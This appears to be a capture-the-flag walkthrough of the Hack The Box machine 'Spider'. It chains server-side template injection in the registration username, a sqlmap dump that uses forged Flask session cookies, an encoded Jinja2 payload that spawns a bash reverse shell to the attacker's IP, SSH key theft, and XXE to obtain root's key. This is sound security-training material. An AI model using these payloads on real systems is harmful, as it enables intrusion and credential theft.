syn Enumeration
Discovered open port 80/tcp on 10.10.10.243
Discovered open port 22/tcp on 10.10.10.243SSH typically isn’t an attack vector so I started by enumerating HTTP.
There’s a furniture store selling different chairs. The admin portal can be seen on the left, along with login and register. We can’t access the admin portal and we need a UUID to login (so common credentials won’t work). I registered an account and used the UUID to login.
We still can’t access the admin page and we still can’t use the admin portal. I tried testing the checkout and looking at requests for different features (checking out, adding to cart, etc) and couldn’t find anything. I went back to the register page to see if I can perform any attacks there.
After a while I managed to perform SSTI by registering an account called {{7*7}}. The actual execution of this is shown in the user information section.
Foothold
Since {{7*7}} worked, we can assume it’s either Jinja2 or Twig. We can register with a username of {{config}} and get the config information, containing the secret key for flask. Taking this over to SQLMAP, we can use the eval argument to query the flask server automatically, injecting via the JWT token.
sqlmap http://spider.htb/ --eval "from flask_unsign import session as s; session = s.sign({'uuid': session}, secret=Key from the config)" --cookie="session=*" --delay 3 –dump
This can be tempermental so play around with the delay. You can just let it run, selecting yes on the first prompt and no for the rest. We get the following from SQLMAP:
+----+--------------------------------------+------+-----------------+
| id | uuid | name | password |
+----+--------------------------------------+------+-----------------+
| 1 | 129f60ea-30cf-4065-afb9-6be45ad38b73 | chiv | REDACTED |
| 2 | efaff2ec-3fd1-4cc0-b23d-425b1efb8fdf | abcd | abcd |
| 3 | 86772b26-07b4-4e57-82ae-a37a896b92e9 | oops | oops |
+----+--------------------------------------+------+-----------------+
Chiv’s account looks interesting, we can sign in using his creds at the login portal
User own
We’re given a few options, we’re able to look at messages and view support tickets. Looking at the messages, we can see there’s a message about a unfinished support portal.
We can probably use SSTI again, this time using a reverse shell. There’s a list of payloads available here.
The payload I’m using is {% with a = request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("echo -n YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xODAvNDQ0NCAwPiYx | base64 -d | bash")["read"]() %} a {% endwith %} The base64 section is a simple bash TCP shell, you can decode that and re-encode it with your own IP and port.
We can catch the connection with netcat and execute commands. The user flag is in Chiv’s home directory (/home/chiv/user.txt) and his ssh key in .ssh (/home/chiv/.ssh/id_rsa). Luckily this isn’t protected so we can copy and use it.
Root own
Since we now have chiv, we can work on rooting the box. As always, we can use linpeas to enumerate possible priv esc vectors. There are some rabbit holes but after some searching, we can see there’s a couple ports open that we didn’t previously have access to.
Port 3306 makes sense since we were using SQL earlier, port 8080 seems interesting. We can access it using an SSH tunnel:
ssh -i chividrsa -L 8080:127.0.0.1:8080 chiv@spider.htb
(You may want to use a different local port, since 8080 is used by BurpSutie by default.)
We can access the website at http://127.0.0.1:8080/
We’re able to login using any username.
There’s not a great deal here, just looks like a page similar. After looking around, I decided to look into the cookie. We can use flask-unsign to decode and look at it:
It’s not very pretty but the important part is the LXML section, we can base64 decode that and have a look at the payload:
The version is also reflected in the source code of the login page:
We’ll use BurpSuite to inject a XXE Payload
This gives us root’s SSH key. We probably could just read root.txt from /root/root.txt but for the sake of being proper, we’ll take the SSH key and login using it. The key may appear distorted but if you click use view-source, you can just copy and paste it.
